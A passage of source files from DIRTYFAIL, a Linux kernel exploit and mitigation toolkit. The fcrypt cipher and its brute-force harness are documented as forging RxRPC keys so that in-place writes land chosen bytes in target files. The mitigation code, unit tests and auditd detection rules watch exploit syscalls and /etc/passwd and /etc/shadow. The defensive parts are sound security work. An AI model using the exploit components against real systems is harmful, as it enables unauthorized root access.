0xec,0x8e,0x19,0x18,0xb4,0x6e,0x3d,0xfd,0x74,0x54,0x1e,0x04,0x85,0xd8,0xbc,0x1f,
0x56,0xe7,0x3a,0x56,0x67,0xd6,0xc8,0xa5,0xf3,0x8e,0xde,0xae,0x37,0x49,0xb7,0xfa,
0xc8,0xf4,0x1f,0xe0,0x2a,0x9b,0x15,0xd1,0x34,0x0e,0xb5,0xe0,0x44,0x78,0x84,0x59,
0x56,0x68,0x77,0xa5,0x14,0x06,0xf5,0x2f,0x8c,0x8a,0x73,0x80,0x76,0xb4,0x10,0x86,
};
static const uint8_t SBOX3_RAW[256] = {
0xa9,0x2a,0x48,0x51,0x84,0x7e,0x49,0xe2,0xb5,0xb7,0x42,0x33,0x7d,0x5d,0xa6,0x12,
0x44,0x48,0x6d,0x28,0xaa,0x20,0x6d,0x57,0xd6,0x6b,0x5d,0x72,0xf0,0x92,0x5a,0x1b,
0x53,0x80,0x24,0x70,0x9a,0xcc,0xa7,0x66,0xa1,0x01,0xa5,0x41,0x97,0x41,0x31,0x82,
0xf1,0x14,0xcf,0x53,0x0d,0xa0,0x10,0xcc,0x2a,0x7d,0xd2,0xbf,0x4b,0x1a,0xdb,0x16,
0x47,0xf6,0x51,0x36,0xed,0xf3,0xb9,0x1a,0xa7,0xdf,0x29,0x43,0x01,0x54,0x70,0xa4,
0xbf,0xd4,0x0b,0x53,0x44,0x60,0x9e,0x23,0xa1,0x18,0x68,0x4f,0xf0,0x2f,0x82,0xc2,
0x2a,0x41,0xb2,0x42,0x0c,0xed,0x0c,0x1d,0x13,0x3a,0x3c,0x6e,0x35,0xdc,0x60,0x65,
0x85,0xe9,0x64,0x02,0x9a,0x3f,0x9f,0x87,0x96,0xdf,0xbe,0xf2,0xcb,0xe5,0x6c,0xd4,
0x5a,0x83,0xbf,0x92,0x1b,0x94,0x00,0x42,0xcf,0x4b,0x00,0x75,0xba,0x8f,0x76,0x5f,
0x5d,0x3a,0x4d,0x09,0x12,0x08,0x38,0x95,0x17,0xe4,0x01,0x1d,0x4c,0xa9,0xcc,0x85,
0x82,0x4c,0x9d,0x2f,0x3b,0x66,0xa1,0x34,0x10,0xcd,0x59,0x89,0xa5,0x31,0xcf,0x05,
0xc8,0x84,0xfa,0xc7,0xba,0x4e,0x8b,0x1a,0x19,0xf1,0xa1,0x3b,0x18,0x12,0x17,0xb0,
0x98,0x8d,0x0b,0x23,0xc3,0x3a,0x2d,0x20,0xdf,0x13,0xa0,0xa8,0x4c,0x0d,0x6c,0x2f,
0x47,0x13,0x13,0x52,0x1f,0x2d,0xf5,0x79,0x3d,0xa2,0x54,0xbd,0x69,0xc8,0x6b,0xf3,
0x05,0x28,0xf1,0x16,0x46,0x40,0xb0,0x11,0xd3,0xb7,0x95,0x49,0xcf,0xc3,0x1d,0x8f,
0xd8,0xe1,0x73,0xdb,0xad,0xc8,0xc9,0xa9,0xa1,0xc2,0xc5,0xe3,0xba,0xfc,0x0e,0x25,
};
/* -------- preprocessed 32-bit S-boxes ----------------------------------- *
*
* The round function does ROUND_KEY ^ HALF_BLOCK then four S-box lookups
* combined by XOR. To make this fast we pre-rotate the S-box outputs
* into the four byte lanes:
*
* sbox0[b] = b (low byte lane)
* sbox1[b] = (b & 0x1f) << 5 in the LOW byte, b >> 5 in the SECOND byte
* (rotation by 8-3=5 bits within a 32-bit big-endian view)
* sbox2[b] = b << 11
* sbox3[b] = b << 19
*
* After all four are XORed, we get the round-function output directly
* in big-endian order, ready to XOR into the other half-block.
*/
static uint32_t SBOX0[256], SBOX1[256], SBOX2[256], SBOX3[256];
void fcrypt_init(void)
{
for (int i = 0; i < 256; i++) {
SBOX0[i] = htonl((uint32_t)SBOX0_RAW[i] << 3);
SBOX1[i] = htonl(((uint32_t)(SBOX1_RAW[i] & 0x1f) << 27) |
((uint32_t)SBOX1_RAW[i] >> 5));
SBOX2[i] = htonl((uint32_t)SBOX2_RAW[i] << 11);
SBOX3[i] = htonl((uint32_t)SBOX3_RAW[i] << 19);
}
}
/* -------- key schedule -------------------------------------------------- *
*
* The key is 8 bytes but only the high 7 bits of each byte are used
* this is the standard 56-bit key with the low bit of each byte serving
* as parity in the AFS rxkad token format. We pack:
*
* k_56 = (key[0]>>1) || (key[1]>>1) || ... || (key[7]>>1) (56 bits)
*
* Then derive 16 round keys by emitting the low 32 bits of k_56 and
* rotating right by 11 bits between each:
*
* round_key[0] = k_56[0..31]
* k_56 = ROR_56(k_56, 11)
* round_key[1] = k_56[0..31]
* ...
* round_key[15] = k_56[0..31] (no rotation after the last)
*/
#define ROR56_11(k) \
((k) = ((k) >> 11) | (((k) & ((1ULL << 11) - 1)) << (56 - 11)))
void fcrypt_setkey(fcrypt_ctx *ctx, const uint8_t key[8])
{
uint64_t k = 0;
for (int i = 0; i < 8; i++) {
k = (k << 7) | (uint64_t)(key[i] >> 1);
}
/* k is now 56 bits in the low order of a uint64_t. */
for (int i = 0; i < 16; i++) {
ctx->round_key[i] = htonl((uint32_t)k);
if (i < 15) ROR56_11(k);
}
}
/* -------- decrypt ------------------------------------------------------- *
*
* Standard 16-round Feistel decrypt with reversed round-key order.
* The round function FF mixes the round key into one half-block, splits
* into 4 bytes, and XORs the four S-box outputs into the other half.
*/
#define FF(R_, L_, k_) do { \
union { uint32_t w; uint8_t b[4]; } u; \
u.w = (k_) ^ (R_); \
(L_) ^= SBOX0[u.b[0]] ^ SBOX1[u.b[1]] ^ SBOX2[u.b[2]] ^ SBOX3[u.b[3]]; \
} while (0)
void fcrypt_decrypt(const fcrypt_ctx *ctx,
uint8_t out[8], const uint8_t in[8])
{
uint32_t L, R;
memcpy(&L, in, 4);
memcpy(&R, in + 4, 4);
FF(L, R, ctx->round_key[0xf]);
FF(R, L, ctx->round_key[0xe]);
FF(L, R, ctx->round_key[0xd]);
FF(R, L, ctx->round_key[0xc]);
FF(L, R, ctx->round_key[0xb]);
FF(R, L, ctx->round_key[0xa]);
FF(L, R, ctx->round_key[0x9]);
FF(R, L, ctx->round_key[0x8]);
FF(L, R, ctx->round_key[0x7]);
FF(R, L, ctx->round_key[0x6]);
FF(L, R, ctx->round_key[0x5]);
FF(R, L, ctx->round_key[0x4]);
FF(L, R, ctx->round_key[0x3]);
FF(R, L, ctx->round_key[0x2]);
FF(L, R, ctx->round_key[0x1]);
FF(R, L, ctx->round_key[0x0]);
memcpy(out, &L, 4);
memcpy(out + 4, &R, 4);
}
/* -------- self-test ----------------------------------------------------- */
bool fcrypt_selftest(void)
{
fcrypt_ctx ctx;
uint8_t out[8];
/* Vector 1: all-zero key. Catches gross structural bugs but the
* key schedule produces all-zero round keys, so it can't catch
* subtle bugs in the 7-bit packing or 11-bit rotation. */
static const uint8_t k1[8] = {0,0,0,0,0,0,0,0};
static const uint8_t c1[8] = {0x0E,0x09,0x00,0xC7,0x3E,0xF7,0xED,0x41};
fcrypt_setkey(&ctx, k1);
fcrypt_decrypt(&ctx, out, c1);
if (memcmp(out, "\x00\x00\x00\x00\x00\x00\x00\x00", 8) != 0)
return false;
/* Vector 2: non-zero key, exercises every byte of the key schedule
* and round-key emit. Pulled from the kernel's crypto/testmgr.h
* fcrypt-pcbc test vector. */
static const uint8_t k2[8] = {0x11,0x44,0x77,0xAA,0xDD,0x00,0x33,0x66};
static const uint8_t c2[8] = {0xD8,0xED,0x78,0x74,0x77,0xEC,0x06,0x80};
static const uint8_t p2[8] = {0x12,0x34,0x56,0x78,0x9A,0xBC,0xDE,0xF0};
fcrypt_setkey(&ctx, k2);
fcrypt_decrypt(&ctx, out, c2);
if (memcmp(out, p2, 8) != 0)
return false;
return true;
}
/* -------- brute-force harness ------------------------------------------- *
*
* splitmix64 fast, statistically decent generator with no library
* dependency. Plenty for a "scan a 56-bit subspace until I hit a
* predicate" loop. Each call advances the seed and returns a 64-bit
* pseudorandom value, which we treat as the 8-byte candidate key.
*/
static uint64_t splitmix64(uint64_t *s)
{
uint64_t z = (*s += 0x9E3779B97F4A7C15ULL);
z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL;
z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL;
return z ^ (z >> 31);
}
bool fcrypt_brute_force(const uint8_t ciphertext[8],
fcrypt_pred_fn predicate,
uint64_t max_iters,
uint64_t seed,
const char *label,
uint8_t key_out[8],
uint8_t plaintext_out[8])
{
fcrypt_ctx ctx;
uint8_t k[8], p[8];
struct timespec t0, t1;
clock_gettime(CLOCK_MONOTONIC, &t0);
for (uint64_t i = 0; i < max_iters; i++) {
uint64_t r = splitmix64(&seed);
memcpy(k, &r, 8);
fcrypt_setkey(&ctx, k);
fcrypt_decrypt(&ctx, p, ciphertext);
if (predicate(p)) {
clock_gettime(CLOCK_MONOTONIC, &t1);
double dt = (t1.tv_sec - t0.tv_sec) +
(t1.tv_nsec - t0.tv_nsec) / 1e9;
log_ok("%s found after %llu iters in %.2fs (%.2f Mops/s)",
label, (unsigned long long)i, dt,
(i + 1) / dt / 1e6);
memcpy(key_out, k, 8);
memcpy(plaintext_out, p, 8);
return true;
}
}
clock_gettime(CLOCK_MONOTONIC, &t1);
double dt = (t1.tv_sec - t0.tv_sec) +
(t1.tv_nsec - t0.tv_nsec) / 1e9;
log_bad("%s exhausted %llu iters in %.2fs without a hit — predicate too strict?",
label, (unsigned long long)max_iters, dt);
return false;
}
+68
View File
@@ -0,0 +1,68 @@
/*
* DIRTYFAIL fcrypt.h
*
* fcrypt is the Andrew File System (AFS) rxkad cipher: 56-bit key,
* 8-byte block, 16-round Feistel structure with four 256-entry S-boxes.
* It is *deterministic*, with a public algorithm specification its
* key space (2^56) is small enough that targeted decryption can be
* brute-forced in user space at ~15-20 M ops / second on a single core.
*
* That property is what makes the RxRPC variant of Dirty Frag
* (CVE-2026-43500) practical: the in-place 8-byte STORE is
* fcrypt_decrypt(C, K), where C is the ciphertext at the target file
* offset and K is the session key the attacker registers via
* add_key("rxrpc", ...). For each STORE position we want, we run the
* fcrypt brute force locally until we find a K such that the resulting
* 8-byte plaintext matches our predicate (e.g. starts with "::").
*
* License: see NOTICE.md. The S-box constants are the rxkad protocol
* tables (also present in the Linux kernel's crypto/fcrypt.c, GPL-2.0,
* David Howells / KTH).
*/
#ifndef DIRTYFAIL_FCRYPT_H
#define DIRTYFAIL_FCRYPT_H
#include "common.h"
typedef struct {
uint32_t round_key[16]; /* big-endian, derived in fcrypt_setkey */
} fcrypt_ctx;
/* Initialize the global S-box tables. Call once before any other fcrypt_*. */
void fcrypt_init(void);
/* Run the kernel test vectors and return true if they match. Use this
* during exploit setup to fail fast on a broken build. */
bool fcrypt_selftest(void);
/* Derive the 16 round keys from an 8-byte key (only the high 7 bits of
* each byte are used; bit 0 of each byte is parity in the rxkad token
* format). */
void fcrypt_setkey(fcrypt_ctx *ctx, const uint8_t key[8]);
/* Decrypt a single 8-byte block. */
void fcrypt_decrypt(const fcrypt_ctx *ctx,
uint8_t out[8], const uint8_t in[8]);
/* Brute-force search predicate: given an 8-byte candidate plaintext,
* return true if it satisfies the constraints we want at this STORE
* position. */
typedef bool (*fcrypt_pred_fn)(const uint8_t plaintext[8]);
/* Search for an 8-byte key K such that fcrypt_decrypt(C, K) satisfies
* `predicate`. Returns true and fills K and the resulting plaintext on
* hit; returns false after `max_iters` non-hits.
*
* `seed` selects the search starting point (deterministic via splitmix64);
* pass time(NULL) for randomness across runs, or a fixed value for
* reproducibility. `label` is logged on hit/timeout for clarity. */
bool fcrypt_brute_force(const uint8_t ciphertext[8],
fcrypt_pred_fn predicate,
uint64_t max_iters,
uint64_t seed,
const char *label,
uint8_t key_out[8],
uint8_t plaintext_out[8]);
#endif
+182
View File
@@ -0,0 +1,182 @@
/*
* DIRTYFAIL mitigate.c defensive deployment
*
* See mitigate.h for the design.
*/
#include "mitigate.h"
#include <fcntl.h>
#include <sys/stat.h>
#include <stdlib.h>
#define MODPROBE_CONF "/etc/modprobe.d/dirtyfail-mitigations.conf"
#define SYSCTL_CONF "/etc/sysctl.d/99-dirtyfail-mitigations.conf"
/* Modules to blacklist. Each is the kernel module name + reason. */
static const struct {
const char *name;
const char *reason;
} BLACKLIST[] = {
{"algif_aead", "Copy Fail (CVE-2026-31431) — authencesn page-cache STORE primitive"},
{"esp4", "Dirty Frag (CVE-2026-43284) — xfrm-ESP IPv4 path"},
{"esp6", "Dirty Frag (CVE-2026-43284) — xfrm-ESP IPv6 path"},
{"rxrpc", "Dirty Frag (CVE-2026-43500) — RxRPC pcbc(fcrypt) path"},
{NULL, NULL},
};
static bool write_file(const char *path, const char *content)
{
int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
if (fd < 0) return false;
size_t n = strlen(content);
ssize_t got = write(fd, content, n);
close(fd);
return got == (ssize_t)n;
}
static bool require_root(void)
{
if (geteuid() != 0) {
log_bad("mitigate requires root — re-run as `sudo dirtyfail --mitigate`");
return false;
}
return true;
}
static int rmmod_if_loaded(const char *name)
{
/* Try via /sbin/rmmod (system shell). Returns 0 if module wasn't
* loaded or unload succeeded; 1 if unload failed. */
char cmd[256];
snprintf(cmd, sizeof(cmd),
"if lsmod | grep -q '^%s '; then "
" rmmod %s 2>/dev/null && echo unloaded || echo \"unload failed (in use?)\"; "
"else "
" echo \"not loaded\"; "
"fi", name, name);
return system(cmd) == 0 ? 0 : 1;
}
df_result_t mitigate_apply(void)
{
log_step("DIRTYFAIL — defensive mitigation deployment");
if (!require_root()) return DF_TEST_ERROR;
log_warn("about to apply system-wide mitigations:");
log_warn(" 1. blacklist algif_aead, esp4, esp6, rxrpc via modprobe");
log_warn(" 2. unload those modules if loaded");
log_warn(" 3. set kernel.apparmor_restrict_unprivileged_userns=1 (where AA loaded)");
log_warn(" 4. drop page cache");
fputc('\n', stderr);
log_warn("SIDE EFFECTS:");
log_warn(" - blacklisting esp4/esp6 BREAKS IPsec / strongSwan / libreswan VPNs");
log_warn(" - blacklisting rxrpc BREAKS AFS distributed file system clients");
log_warn(" - blacklisting algif_aead BREAKS userspace AEAD via AF_ALG (rare)");
fputc('\n', stderr);
log_warn("undo with `dirtyfail --cleanup-mitigate` (removes config files, leaves modules unloaded)");
if (!typed_confirm("DIRTYFAIL")) {
log_bad("confirmation declined — aborting");
return DF_OK;
}
/* 1. Write modprobe blacklist */
char buf[2048];
char *p = buf;
p += snprintf(p, sizeof(buf) - (p - buf),
"# DIRTYFAIL mitigations — blacklist modules that expose the\n"
"# Copy Fail (CVE-2026-31431) and Dirty Frag (CVE-2026-43284,\n"
"# CVE-2026-43500) page-cache write primitives.\n"
"#\n"
"# Generated by `dirtyfail --mitigate`. Remove with\n"
"# `dirtyfail --cleanup-mitigate` or by deleting this file.\n"
"\n");
for (int i = 0; BLACKLIST[i].name; i++) {
p += snprintf(p, sizeof(buf) - (p - buf),
"# %s\n"
"install %s /bin/false\n",
BLACKLIST[i].reason, BLACKLIST[i].name);
}
if (!write_file(MODPROBE_CONF, buf)) {
log_bad("failed to write %s: %s", MODPROBE_CONF, strerror(errno));
return DF_TEST_ERROR;
}
log_ok("wrote %s", MODPROBE_CONF);
/* 2. Unload currently loaded modules */
log_step("unloading currently-loaded modules:");
for (int i = 0; BLACKLIST[i].name; i++) {
printf(" %s: ", BLACKLIST[i].name);
fflush(stdout);
rmmod_if_loaded(BLACKLIST[i].name);
}
/* 3. Set AppArmor sysctl (only if AA is loaded) */
int sysctl_fd = open("/proc/sys/kernel/apparmor_restrict_unprivileged_userns", O_WRONLY);
if (sysctl_fd >= 0) {
if (write(sysctl_fd, "1\n", 2) == 2)
log_ok("set apparmor_restrict_unprivileged_userns=1 (runtime)");
else
log_warn("could not set apparmor_restrict_unprivileged_userns: %s", strerror(errno));
close(sysctl_fd);
/* Persist via sysctl.d */
const char *sysctl_content =
"# DIRTYFAIL mitigations — block unprivileged userns capability acquisition.\n"
"# This prevents the xfrm-ESP / RxRPC / GCM exploit infrastructure from\n"
"# obtaining CAP_NET_ADMIN inside a fresh user namespace.\n"
"kernel.apparmor_restrict_unprivileged_userns = 1\n";
if (write_file(SYSCTL_CONF, sysctl_content))
log_ok("wrote %s (persists across reboot)", SYSCTL_CONF);
else
log_warn("could not write %s: %s", SYSCTL_CONF, strerror(errno));
} else {
log_hint("AppArmor sysctl not present (kernel without AA, or AA not loaded) — skipping");
}
/* 4. Drop page cache */
int dc = open("/proc/sys/vm/drop_caches", O_WRONLY);
if (dc >= 0) {
ssize_t n = write(dc, "3\n", 2);
close(dc);
if (n == 2) log_ok("dropped page cache");
}
fputc('\n', stdout);
log_ok("=== mitigation summary ===");
log_ok(" modprobe blacklist: %s", MODPROBE_CONF);
log_ok(" sysctl persistence: %s", SYSCTL_CONF);
log_ok(" modules unloaded: algif_aead, esp4, esp6, rxrpc (where loaded)");
fputc('\n', stdout);
log_hint("Re-verify with `dirtyfail --scan` — should now report most modes as");
log_hint("preconditions missing or mitigated.");
fputc('\n', stdout);
log_hint("Ultimate fix: install kernel update with f4c50a4034e6 backport.");
return DF_OK;
}
df_result_t mitigate_revert(void)
{
log_step("DIRTYFAIL — revert mitigations");
if (!require_root()) return DF_TEST_ERROR;
log_warn("removing %s + %s", MODPROBE_CONF, SYSCTL_CONF);
log_warn("modules will NOT be auto-loaded — operator decides if/when");
if (!typed_confirm("DIRTYFAIL")) {
log_bad("confirmation declined");
return DF_OK;
}
if (unlink(MODPROBE_CONF) == 0) log_ok("removed %s", MODPROBE_CONF);
else if (errno == ENOENT) log_hint("%s did not exist", MODPROBE_CONF);
else log_bad("unlink %s: %s", MODPROBE_CONF, strerror(errno));
if (unlink(SYSCTL_CONF) == 0) log_ok("removed %s", SYSCTL_CONF);
else if (errno == ENOENT) log_hint("%s did not exist", SYSCTL_CONF);
else log_bad("unlink %s: %s", SYSCTL_CONF, strerror(errno));
log_hint("modules can be reloaded individually with `sudo modprobe <name>`");
return DF_OK;
}
+46
View File
@@ -0,0 +1,46 @@
/*
* DIRTYFAIL mitigate.h
*
* Defensive companion to the exploit modes: applies all known
* mitigations for Copy Fail / Dirty Frag in one shot. Intended for
* sysadmins who want a fast "fix this until the kernel patch lands"
* deployment.
*
* What `--mitigate` does:
*
* 1. Writes /etc/modprobe.d/dirtyfail-mitigations.conf with
* `install <mod> /bin/false` blacklists for:
* - algif_aead (Copy Fail authencesn primitive)
* - esp4 + esp6 (Dirty Frag xfrm-ESP path)
* - rxrpc (Dirty Frag RxRPC path)
*
* 2. rmmods any of those that are currently loaded.
*
* 3. Sets `kernel.apparmor_restrict_unprivileged_userns=1` (where
* AppArmor is loaded). Persists via /etc/sysctl.d/.
*
* 4. Drops the page cache to evict any pre-existing page-cache
* modifications.
*
* 5. Reports what it did so the operator can audit / undo.
*
* Caveats:
* - Requires root.
* - Disabling esp4/esp6 breaks IPsec / strongSwan.
* - Disabling rxrpc breaks AFS clients.
* - These are interim mitigations; the right fix is the kernel patch.
*
* Run with `--cleanup-mitigate` to undo (removes the blacklist conf,
* removes the sysctl conf, but does not unload modules operator
* decides if/when to reload).
*/
#ifndef DIRTYFAIL_MITIGATE_H
#define DIRTYFAIL_MITIGATE_H
#include "common.h"
df_result_t mitigate_apply(void);
df_result_t mitigate_revert(void);
#endif
@@ -0,0 +1,101 @@
/*
* tests/test_aes_ecb.c
*
* Verifies that the kernel's AF_ALG `ecb(aes)` implementation produces
* the expected outputs for known AES-128-ECB test vectors. This is the
* primitive that copyfail_gcm.c uses to compute GCM keystream byte 0
* via the J0+1 counter block trick.
*
* If this test passes, the GCM exploit's brute-force loop is sound.
* If it fails, the kernel's AES implementation differs from spec no
* exploit will produce the right STORE values.
*
* Linux-only. Uses the same AF_ALG primitives as copyfail_gcm.c.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <linux/if_alg.h>
static int failures = 0;
#define ASSERT(cond, msg, ...) do { \
if (!(cond)) { fprintf(stderr, "FAIL: " msg "\n", ##__VA_ARGS__); failures++; } \
else { fprintf(stderr, " ok: " msg "\n", ##__VA_ARGS__); } \
} while (0)
static int alg_open_ecb_aes(const unsigned char key[16])
{
int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (s < 0) return -1;
struct sockaddr_alg sa = { .salg_family = AF_ALG };
strcpy((char *)sa.salg_type, "skcipher");
strcpy((char *)sa.salg_name, "ecb(aes)");
if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { close(s); return -1; }
if (setsockopt(s, SOL_ALG, ALG_SET_KEY, key, 16) < 0) { close(s); return -1; }
return s;
}
static int aes_ecb_encrypt(int s, const unsigned char in[16], unsigned char out[16])
{
int op = accept(s, NULL, NULL);
if (op < 0) return -1;
char cbuf[CMSG_SPACE(sizeof(int))] = {0};
struct msghdr msg = { .msg_control = cbuf, .msg_controllen = sizeof(cbuf) };
struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
c->cmsg_level = SOL_ALG; c->cmsg_type = ALG_SET_OP; c->cmsg_len = CMSG_LEN(sizeof(int));
*(int *)CMSG_DATA(c) = ALG_OP_ENCRYPT;
struct iovec iov = { .iov_base = (void *)in, .iov_len = 16 };
msg.msg_iov = &iov; msg.msg_iovlen = 1;
if (sendmsg(op, &msg, 0) != 16) { close(op); return -1; }
int n = read(op, out, 16);
close(op);
return n == 16 ? 0 : -1;
}
int main(void)
{
/* NIST test vector: AES-128 ECB
* key = 000102030405060708090a0b0c0d0e0f
* pt = 000102030405060708090a0b0c0d0e0f
* ct = 0a940bb5416ef045f1c39458c653ea5a
*/
unsigned char key[16], in[16], out[16];
for (int i = 0; i < 16; i++) { key[i] = i; in[i] = i; }
static const unsigned char expected[16] = {
0x0a,0x94,0x0b,0xb5,0x41,0x6e,0xf0,0x45,
0xf1,0xc3,0x94,0x58,0xc6,0x53,0xea,0x5a
};
int s = alg_open_ecb_aes(key);
ASSERT(s >= 0, "AF_ALG skcipher ecb(aes) bindable + keyable");
if (s < 0) return 1;
ASSERT(aes_ecb_encrypt(s, in, out) == 0, "single-block ECB encrypt completes");
ASSERT(memcmp(out, expected, 16) == 0,
"ECB(K=0..15, P=0..15) = 0a940bb5416ef045f1c39458c653ea5a");
if (memcmp(out, expected, 16) != 0) {
fprintf(stderr, " got: ");
for (int i = 0; i < 16; i++) fprintf(stderr, "%02x", out[i]);
fprintf(stderr, "\n");
}
/* GCM J0+1 counter block sanity: nonce(12) || 0x00000002. byte 0 of
* the encrypted block is the keystream byte that XORs onto plaintext
* byte 0 in GCM. We don't verify against a specific GCM vector here
* (no canonical short test for this), just that the operation runs. */
unsigned char counter[16];
memset(counter, 0xab, 12);
counter[12] = 0; counter[13] = 0; counter[14] = 0; counter[15] = 2;
ASSERT(aes_ecb_encrypt(s, counter, out) == 0,
"GCM J0+1 counter block encrypt (keystream byte computation)");
close(s);
fprintf(stderr, "\n%d failure(s)\n", failures);
return failures > 0 ? 1 : 0;
}
@@ -0,0 +1,84 @@
/*
* tests/test_fcrypt.c
*
* Selftest for the rxkad fcrypt cipher implementation in src/fcrypt.c.
* Built standalone via `make test`. No DIRTYFAIL runtime needed.
*
* Verifies:
* - All-zero key vector (catches gross structural bugs)
* - Non-zero key vector from kernel testmgr.h (catches subtle bugs
* in 7-bit packing or 11-bit ROR key schedule)
* - Brute-force harness convergence (sanity-checks predicate gating)
*/
#include "../src/fcrypt.h"
#include "../src/common.h"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>
static int failures = 0;
#define ASSERT(cond, msg, ...) do { \
if (!(cond)) { \
fprintf(stderr, "FAIL: " msg "\n", ##__VA_ARGS__); \
failures++; \
} else { \
fprintf(stderr, " ok: " msg "\n", ##__VA_ARGS__); \
} \
} while (0)
static bool predicate_match_first_byte(const uint8_t p[8])
{
return p[0] == 0xAB;
}
int main(void)
{
fcrypt_init();
/* Selftest covers both vectors. */
ASSERT(fcrypt_selftest(),
"fcrypt_selftest passes (covers k=0 and k=1144...66 vectors)");
/* Spot-check vector 1 directly */
fcrypt_ctx ctx;
uint8_t out[8];
static const uint8_t k1[8] = {0,0,0,0,0,0,0,0};
static const uint8_t c1[8] = {0x0E,0x09,0x00,0xC7,0x3E,0xF7,0xED,0x41};
fcrypt_setkey(&ctx, k1);
fcrypt_decrypt(&ctx, out, c1);
ASSERT(memcmp(out, "\x00\x00\x00\x00\x00\x00\x00\x00", 8) == 0,
"vector 1: decrypt(k=0, ct=0E0900C73EF7ED41) = 0000000000000000");
/* Spot-check vector 2 directly */
static const uint8_t k2[8] = {0x11,0x44,0x77,0xAA,0xDD,0x00,0x33,0x66};
static const uint8_t c2[8] = {0xD8,0xED,0x78,0x74,0x77,0xEC,0x06,0x80};
static const uint8_t p2[8] = {0x12,0x34,0x56,0x78,0x9A,0xBC,0xDE,0xF0};
fcrypt_setkey(&ctx, k2);
fcrypt_decrypt(&ctx, out, c2);
ASSERT(memcmp(out, p2, 8) == 0,
"vector 2: decrypt(k=11447 7AAD D003 366, ct=D8ED787477EC0680) = 123456789ABCDEF0");
/* Brute-force smoke test: search for K such that decrypt(C=0..7) starts with 0xAB.
* Predicate hit rate = 1/256, so ~256 iters expected. Hard cap at 1<<20. */
uint8_t key_out[8], pt_out[8];
static const uint8_t test_ct[8] = {0,1,2,3,4,5,6,7};
bool found = fcrypt_brute_force(test_ct, predicate_match_first_byte,
1 << 20, (uint64_t)time(NULL),
"smoke", key_out, pt_out);
ASSERT(found,
"brute force converges on first-byte=0xAB predicate within 1M iters");
if (found) {
/* Verify the discovered key actually produces the claimed plaintext */
fcrypt_setkey(&ctx, key_out);
fcrypt_decrypt(&ctx, out, test_ct);
ASSERT(memcmp(out, pt_out, 8) == 0 && out[0] == 0xAB,
"discovered key produces claimed plaintext (roundtrip OK)");
}
fprintf(stderr, "\n%d failure(s)\n", failures);
return failures > 0 ? 1 : 0;
}
@@ -0,0 +1,100 @@
# DIRTYFAIL — auditd detection rules
#
# Drop into /etc/audit/rules.d/, then reload:
#
# sudo install -m 0640 99-dirtyfail.rules /etc/audit/rules.d/
# sudo augenrules --load
# sudo systemctl restart auditd
#
# These rules generate audit events for the syscalls the DIRTYFAIL
# exploit chain uses. They are intentionally noisy on systems that
# legitimately use rootless containers, IPsec, or AFS — review the
# Tuning section before enabling on a production host.
#
# Search recorded events:
#
# sudo ausearch -k dirtyfail-xfrm
# sudo ausearch -k dirtyfail-rxkey
# sudo ausearch -k dirtyfail-userns
#
# Rules MUST stay on single lines — auditctl(8) does not honor
# backslash-newline continuations in rule files.
#
# Tested on: Debian 13, Ubuntu 24.04/26.04, AlmaLinux 10, Fedora 44.
## ----------------------------------------------------------------- ##
## 1. XFRM netlink registration from a non-root account
##
## socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM) is an extremely strong
## signal: legitimate use is "ip xfrm" (root) or `swanctl`/charon (root)
## or networkd (root). An unprivileged account creating this socket
## is the precondition for ESP v4/v6/GCM exploitation.
##
## socket() args: a0=family(16=AF_NETLINK) a2=protocol(6=NETLINK_XFRM)
## auid filter: ignore kernel/system processes (auid=4294967295)
## match interactive logins (auid >= 1000)
## ----------------------------------------------------------------- ##
-a always,exit -F arch=b64 -S socket -F a0=16 -F a2=6 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-xfrm
-a always,exit -F arch=b32 -S socket -F a0=16 -F a2=6 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-xfrm
## ----------------------------------------------------------------- ##
## 2. add_key("rxrpc", ...) — RxRPC session-key registration
##
## The rxkad-handshake forgery requires registering a rxrpc-typed key
## via add_key(2). On most servers this should never happen from an
## unprivileged uid; AFS clients that legitimately use this run as
## root or a service account.
## ----------------------------------------------------------------- ##
-a always,exit -F arch=b64 -S add_key -F auid>=1000 -F auid!=4294967295 -k dirtyfail-rxkey
-a always,exit -F arch=b32 -S add_key -F auid>=1000 -F auid!=4294967295 -k dirtyfail-rxkey
## ----------------------------------------------------------------- ##
## 3. unshare(CLONE_NEWUSER) from interactive accounts
##
## CLONE_NEWUSER == 0x10000000. Every DIRTYFAIL exploit mode does this
## once. WARNING: this fires on every legitimate `unshare -U`, every
## podman/buildah container start, every chrome/firefox sandbox spawn.
## Filter to executions you don't expect, or treat as low-fidelity noise
## that pairs well with the dirtyfail-xfrm key for high-fidelity alerts.
## ----------------------------------------------------------------- ##
-a always,exit -F arch=b64 -S unshare -F a0&268435456 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-userns
-a always,exit -F arch=b32 -S unshare -F a0&268435456 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-userns
## ----------------------------------------------------------------- ##
## 4. AF_ALG socket creation — Copy Fail / GCM precondition
##
## socket(AF_ALG, ...). a0=38 (PF_ALG). Legitimate uses: cryptsetup,
## kernel-side TLS offload, some QEMU paths. Suspicious from a shell
## account.
## ----------------------------------------------------------------- ##
-a always,exit -F arch=b64 -S socket -F a0=38 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-afalg
-a always,exit -F arch=b32 -S socket -F a0=38 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-afalg
## ----------------------------------------------------------------- ##
## 5. Directly watch /etc/passwd and /etc/shadow for in-place modifications
##
## A successful exploit modifies the page-cache copy (which is what
## PAM reads), but these watches fire when /usr/bin/passwd, vipw, or
## anything else opens these files for writing. Useful as a baseline
## change-detection rule independent of DIRTYFAIL.
## ----------------------------------------------------------------- ##
-w /etc/passwd -p wa -k dirtyfail-passwd-write
-w /etc/shadow -p wa -k dirtyfail-shadow-write
## ----------------------------------------------------------------- ##
## Tuning notes
##
## - On servers running rootless containers, dirtyfail-userns will be
## high-volume noise. Either drop rule 3, or filter on `comm!=podman`
## etc. for your specific runtime.
## - On IPsec gateways, dirtyfail-xfrm fires for every legitimate SA
